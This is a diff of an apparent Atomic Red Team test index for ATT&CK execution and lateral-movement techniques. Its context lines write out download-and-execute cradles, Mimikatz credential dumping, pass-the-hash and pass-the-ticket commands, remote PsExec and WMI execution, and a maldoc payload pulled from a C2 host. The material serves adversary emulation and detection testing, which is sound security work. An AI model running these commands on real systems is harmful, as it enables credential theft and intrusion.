[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -67958,13 +67958,13 @@ execution:
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
-'
+ '
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
description: 'Uses cscript //E:jscript to download a file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -67982,7 +67982,7 @@ execution:
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
-'
+ '
name: command_prompt
- name: Maldoc choice flags command execution
auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
@@ -68000,7 +68000,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68011,7 +68011,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68039,7 +68039,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68050,7 +68050,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68077,7 +68077,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68088,7 +68088,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68120,7 +68120,7 @@ execution:
dependencies:
- description: 'Microsoft Excel must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
@@ -68130,7 +68130,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
-'
+ '
executor:
command: |
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
@@ -68202,7 +68202,7 @@ execution:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -68211,10 +68211,10 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
- description: 'Google Chrome must be installed
-'
+ '
prereq_command: |
try {
$chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
@@ -68223,7 +68223,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Google Chrome manually
to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68232,7 +68232,7 @@ execution:
name: powershell
cleanup_command: 'Stop-Process -name mshta
-'
+ '
- name: Potentially Unwanted Applications (PUA)
auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
description: 'The Potentially Unwanted Applications (PUA) protection feature
@@ -68244,7 +68244,7 @@ execution:
instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify
anti-pua protection).
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -68279,14 +68279,14 @@ execution:
macro_path:
description: 'Location of file which will be converted to a VBA macro
-'
+ '
type: Path
default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt
c2_domain:
description: 'This required variable points to a user defined HTTP server
that will host the file_name in the c2_parent_directory.
-'
+ '
type: Url
default:
c2_parent_directory:
@@ -68305,7 +68305,7 @@ execution:
ms_product:
description: 'Maldoc application Word or Excel
-'
+ '
type: String
default: Word
dependency_executor_name: powershell
@@ -68313,17 +68313,17 @@ execution:
- description: 'Destination c2_domain name or IP address must be set to a running
HTTP server.
-'
+ '
prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1)
-'
+ '
get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address
must be set and reachable for HTTP service"
-'
+ '
- description: 'Microsoftt #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68334,7 +68334,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
name: powershell
command: |
@@ -68347,7 +68347,7 @@ execution:
cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}"
-ErrorAction Ignore
-'
+ '
T1204.003:
technique:
object_marking_refs:
@@ -68708,7 +68708,7 @@ execution:
description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz
dump details and password hashes will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -68720,7 +68720,7 @@ execution:
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
Invoke-Mimikatz -DumpCreds"
-'
+ '
name: command_prompt
elevation_required: true
- name: Run BloodHound from local disk
@@ -68740,15 +68740,15 @@ execution:
dependencies:
- description: 'SharpHound.ps1 must be located at #{file_path}
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1"
-OutFile "#{file_path}\SharpHound.ps1"
-'
+ '
executor:
command: |
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
@@ -68757,7 +68757,7 @@ execution:
Start-Sleep 5
cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
-'
+ '
name: powershell
- name: Run Bloodhound from Memory using Download Cradle
auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -68775,7 +68775,7 @@ execution:
Start-Sleep 5
cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
-'
+ '
name: powershell
- name: Obfuscation Tests
auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
@@ -68783,7 +68783,7 @@ execution:
out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM
REMOTE LOCATION"
-'
+ '
supported_platforms:
- windows
executor:
@@ -68798,7 +68798,7 @@ execution:
will take place to open file explorer, open notepad and input code, then mimikatz
dump info will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -68829,7 +68829,7 @@ execution:
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
-'
+ '
name: command_prompt
- name: Powershell MsXml COM object - with prompt
auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
@@ -68849,7 +68849,7 @@ execution:
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
-'
+ '
name: command_prompt
- name: Powershell XML requests
auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
@@ -68869,7 +68869,7 @@ execution:
bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
| IEX"
-'
+ '
name: command_prompt
- name: Powershell invoke mshta.exe download
auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
@@ -68887,7 +68887,7 @@ execution:
executor:
command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
-'
+ '
name: command_prompt
- name: Powershell Invoke-DownloadCradle
auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
@@ -68929,26 +68929,26 @@ execution:
dependencies:
- description: 'PowerShell version 2 must be installed
-'
+ '
prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Automated installer not implemented yet,
please install PowerShell v2 manually
-'
+ '
executor:
command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
-'
+ '
name: powershell
- name: NTFS Alternate Data Stream Access
auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
description: 'Creates a file with an alternate data stream and simulates executing
that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -68959,14 +68959,14 @@ execution:
dependencies:
- description: 'Homedrive must be an NTFS drive
-'
+ '
prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem
-contains "NTFS") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically
-'
+ '
executor:
name: powershell
command: |
@@ -68975,7 +68975,7 @@ execution:
Invoke-Expression $streamcommand
cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
-'
+ '
- name: PowerShell Session Creation and Use
auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
description: |
@@ -68992,12 +68992,12 @@ execution:
dependencies:
- description: 'PSRemoting must be enabled
-'
+ '
prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect}
-ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n"
get_prereq_command: 'Enable-PSRemoting
-'
+ '
executor:
name: powershell
elevation_required: true
@@ -69031,7 +69031,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-CommandParamVariation #{command_param_variation} -Execute -ErrorAction
@@ -69067,7 +69067,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation
@@ -69098,7 +69098,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-EncodedCommandParamVariation #{encoded_command_param_variation} -Execute
@@ -69134,7 +69134,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments
@@ -69147,7 +69147,7 @@ execution:
outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection
Report by Red Canary.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -69158,7 +69158,7 @@ execution:
executor:
command: 'powershell.exe -e #{obfuscated_code}
-'
+ '
name: command_prompt
- name: PowerShell Invoke Known Malicious Cmdlets
auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
@@ -69180,7 +69180,7 @@ execution:
"PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy",
"Set-CriticalProcess", "Set-MasterBootRecord"
-'
+ '
executor:
name: powershell
elevation_required: true
@@ -69194,7 +69194,7 @@ execution:
auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia
-'
+ '
supported_platforms:
- windows
executor:
@@ -69280,7 +69280,7 @@ execution:
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: 'pip install requests
-'
+ '
executor:
command: |
which_python=$(which python || which python3 || which python2)
@@ -69320,7 +69320,7 @@ execution:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
@@ -69347,7 +69347,7 @@ execution:
an external malicious script then executes locally using the supplied executor
and arguments
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -69381,7 +69381,7 @@ execution:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
@@ -69404,7 +69404,7 @@ execution:
name: sh
cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name}
-'
+ '
T1053.005:
technique:
type: attack-pattern
@@ -69502,7 +69502,7 @@ execution:
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -69519,10 +69519,10 @@ execution:
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
-'
+ '
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
@@ -69558,11 +69558,11 @@ execution:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
-'
+ '
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
@@ -69584,7 +69584,7 @@ execution:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
-'
+ '
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
@@ -69601,7 +69601,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -69612,7 +69612,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -69625,7 +69625,7 @@ execution:
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
-'
+ '
supported_platforms:
- windows
executor:
@@ -69637,7 +69637,7 @@ execution:
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
-'
+ '
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
@@ -69873,7 +69873,7 @@ execution:
sc.exe delete #{service_name}
cleanup_command: 'del C:\art-marker.txt >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Use PsExec to execute a command on a remote host
@@ -69907,10 +69907,10 @@ execution:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -69920,14 +69920,14 @@ execution:
command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula
"C:\Windows\System32\calc.exe"
-'
+ '
name: command_prompt
- name: psexec.py (Impacket)
auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35
description: 'Will execute a command on the remote host with Impacket psexec.py
script.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -69955,18 +69955,18 @@ execution:
dependencies:
- description: 'psexec.py (Impacket)
-'
+ '
prereq_command: 'if [ -x "$(command -v psexec.py)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'sudo pip3 install impacket
-'
+ '
executor:
command: 'psexec.py ''#{domain}/#{username}:#{password}@#{remote_host}'' ''#{command}''
-'
+ '
name: bash
T1129:
technique:
@@ -70099,7 +70099,7 @@ execution:
description: 'An adversary may use Radmin Viewer Utility to remotely control
Windows device, this will start the radmin console.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70115,10 +70115,10 @@ execution:
- description: 'Radmin Viewer Utility must be installed at specified location
(#{radmin_exe})
-'
+ '
prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading radmin installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -70348,20 +70348,20 @@ execution:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
@@ -70378,20 +70378,20 @@ execution:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
@@ -70459,7 +70459,7 @@ execution:
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
description: 'Creates and executes a simple bash script.
-'
+ '
supported_platforms:
- macos
- linux
@@ -70476,7 +70476,7 @@ execution:
sh #{script_path}
cleanup_command: 'rm #{script_path}
-'
+ '
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -70493,7 +70493,7 @@ execution:
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
cleanup_command: 'rm /tmp/art-fish.txt
-'
+ '
name: sh
- name: Harvest SUID executable files
auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
@@ -70515,13 +70515,13 @@ execution:
dependencies:
- description: 'AutoSUID must exist on disk at specified location (#{autosuid})
-'
+ '
prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'curl #{autosuid_url} --output #{autosuid}
-'
+ '
executor:
command: |
chmod +x #{autosuid}
@@ -70534,7 +70534,7 @@ execution:
from these commands to present operator with ways of escalating privileges
or further exploitation of targeted host.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -70550,13 +70550,13 @@ execution:
dependencies:
- description: 'LinnEnum must exist on disk at specified location (#{linenum})
-'
+ '
prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'curl #{linenum_url} --output #{linenum}
-'
+ '
executor:
command: |
chmod +x #{linenum}
@@ -70714,7 +70714,7 @@ execution:
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -70725,7 +70725,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -70734,7 +70734,7 @@ execution:
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
-'
+ '
name: powershell
- name: Extract Memory via VBA
auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
@@ -70753,7 +70753,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -70764,7 +70764,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -70773,7 +70773,7 @@ execution:
cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
-ErrorAction Ignore
-'
+ '
name: powershell
T1059.003:
technique:
@@ -70823,7 +70823,7 @@ execution:
description: 'Creates and executes a simple batch script. Upon execution, CMD
will briefly launch to run the batch script then close again.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70839,27 +70839,27 @@ execution:
dependencies:
- description: 'Batch file must exist on disk at specified location (#{script_path})
-'
+ '
prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item #{script_path} -Force | Out-Null
Set-Content -Path #{script_path} -Value "#{command_to_execute}"
executor:
command: 'Start-Process #{script_path}
-'
+ '
cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Writes text to a file and displays it.
auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
description: 'Writes text to a file and display the results. This test is intended
to emulate the dropping of a malicious file to disk.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70874,17 +70874,17 @@ execution:
executor:
command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
-'
+ '
cleanup_command: 'del "#{file_contents_path}" >nul 2>&1
-'
+ '
name: command_prompt
- name: Suspicious Execution via Windows Command Shell
auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
description: 'Command line executed via suspicious invocation. Example is from
the 2021 Threat Detection Report by Red Canary.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70922,22 +70922,22 @@ execution:
dependencies:
- description: 'File to print must exist on disk at specified location (#{file_to_print})
-'
+ '
prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'new-item #{file_to_print} -value "This file has been
created by T1059.003 Test 4" -Force | Out-Null
-'
+ '
executor:
command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe
/p #{file_to_print}" | out-null
-'
+ '
cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue
-'
+ '
name: powershell
T1047:
technique:
@@ -71003,7 +71003,7 @@ execution:
executor:
command: 'wmic useraccount get /ALL /format:csv
-'
+ '
name: command_prompt
- name: WMI Reconnaissance Processes
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -71015,7 +71015,7 @@ execution:
executor:
command: 'wmic process get caption,executablepath,commandline /format:csv
-'
+ '
name: command_prompt
- name: WMI Reconnaissance Software
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -71027,7 +71027,7 @@ execution:
executor:
command: 'wmic qfe get description,installedOn /format:csv
-'
+ '
name: command_prompt
- name: WMI Reconnaissance List Remote Services
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
@@ -71051,7 +71051,7 @@ execution:
executor:
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
-'
+ '
name: command_prompt
- name: WMI Execute Local Process
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
@@ -71068,11 +71068,11 @@ execution:
executor:
command: 'wmic process call create #{process_to_execute}
-'
+ '
cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete
>nul 2>&1
-'
+ '
name: command_prompt
- name: WMI Execute Remote Process
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
@@ -71103,11 +71103,11 @@ execution:
command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process
call create #{process_to_execute}
-'
+ '
cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}"
process where name=''#{process_to_execute}'' delete >nul 2>&1
-'
+ '
name: command_prompt
- name: Create a Process using WMI Query and an Encoded Command
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
@@ -71124,7 +71124,7 @@ execution:
executor:
command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
-'
+ '
name: command_prompt
- name: Create a Process using obfuscated Win32_Process
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
@@ -71158,7 +71158,7 @@ execution:
description: 'This test uses wmic.exe to execute a DLL function using rundll32.
Specify a valid value for remote IP using the node parameter.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -71182,12 +71182,12 @@ execution:
get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true"
-OutFile "#{dll_to_execute}"
-'
+ '
executor:
command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute}
#{function_to_execute}"
-'
+ '
cleanup_command: taskkill /f /im calculator.exe
name: powershell
- name: Application uninstall using WMIC
@@ -71514,7 +71514,7 @@ lateral-movement:
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
-'
+ '
name: powershell
T1210:
technique:
@@ -71769,7 +71769,7 @@ lateral-movement:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -71784,13 +71784,13 @@ lateral-movement:
command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
/ntlm:#{ntlm}"
-'
+ '
name: command_prompt
- name: crackmapexec Pass the Hash
auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
description: 'command execute with crackmapexec
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -71819,14 +71819,14 @@ lateral-movement:
- description: 'CrackMapExec executor must exist on disk at specified location
(#{crackmapexec_exe})
-'
+ '
prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Automated installer not implemented yet, please
install crackmapexec manually at this location: #{crackmapexec_exe}
-'
+ '
executor:
command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n"
name: command_prompt
@@ -71907,7 +71907,7 @@ lateral-movement:
auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
description: 'Similar to PTH, but attacking Kerberos
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -71924,10 +71924,10 @@ lateral-movement:
dependencies:
- description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-'
+ '
prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
@@ -71938,7 +71938,7 @@ lateral-movement:
executor:
command: '#{mimikatz_exe} "kerberos::ptt #{ticket}"
-'
+ '
name: command_prompt
- name: Rubeus Kerberos Pass The Ticket
auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb
@@ -71981,19 +71981,19 @@ lateral-movement:
dependencies:
- description: 'Rubeus must exist on disk at specified location (#{rubeus_path})
-'
+ '
prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}
-'
+ '
- description: 'PsExec must exist on disk at specified location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
